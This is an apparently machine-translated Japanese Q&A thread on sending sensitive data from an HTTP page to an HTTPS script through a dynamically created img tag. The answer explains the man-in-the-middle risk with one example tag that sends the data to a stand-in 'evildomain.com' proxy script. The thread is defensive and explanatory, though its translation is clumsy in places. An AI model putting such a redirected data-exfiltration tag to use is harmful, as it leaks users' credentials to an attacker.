HTTP、HTTPS&Ajaxのバイパス、多分?
-
20-09-2019 - |
質問
私はページ(別名AJAX)をリロードすることなく、ブラウザからのデータを渡す必要があるサーバースクリプトを持っています。データは敏感であるので、HTTPS経由で送信する必要があります。ページには、しかし、HTTP層の上にあります。同じドメイン/プロトコル制限のなので、ブラウザがこれを許可しません。
私は少し動的にイメージタグを作成することによって、システムを不正行為のことを考えて、そのようにSRCタグを使用してスクリプトを呼び出しています:
<img src="https://mydomain.com/mysecurescript/&data=to&pass=to&my=script" />
私は、これは確かに適切に暗号化されますかどうかを知りたいと思います。
解決
これに伴う問題は、ページ自体はHTTPのみである場合は、その後、あなたは中間者攻撃を受けやすいですです。それは代わりに使用するように、攻撃者がちょうどHTTP経由で送信されるページにスクリプトを変更することができます:
<img src="http://evildomain.com/evilproxyscript/&data=to&pass=to&my=script" />
ユーザーは、none-賢明だろう。これを回避するには、本当にあまりにもHTTPS経由でページを提供する必要があります - 。きちんと同時にあなたの他の問題を解決している。
は、(これはまさに、ログインフォームは、HTTPSページにあるべき理由と同じ理由であるだけで、フォームのアクションがされるのではなくHTTPS)。
他のヒント
はいなし。
接続を設定するために使用されているので、URLのサーバーのアドレス部分は明らかに暗号化されていません。
他のすべては、HTTPS接続を介して送信されている間に暗号化されます。しかし、ソースを見て誰もが明らかに掲示されているデータを見ることができます。
また、一部のブラウザでは表示されません(または表示する前にユーザーに警告します)という混合モード(HTTP対https)をHTMLページに言及負担します。ユーザがそれをブロックするように選択するので、いくつかのケースでは、これは動作しない可能性があります。
画像技術への可能な代替は、 ASSL の
どちらの方法は、暗号化が起こっになります、との両方がまだ中間者攻撃で男に弱います。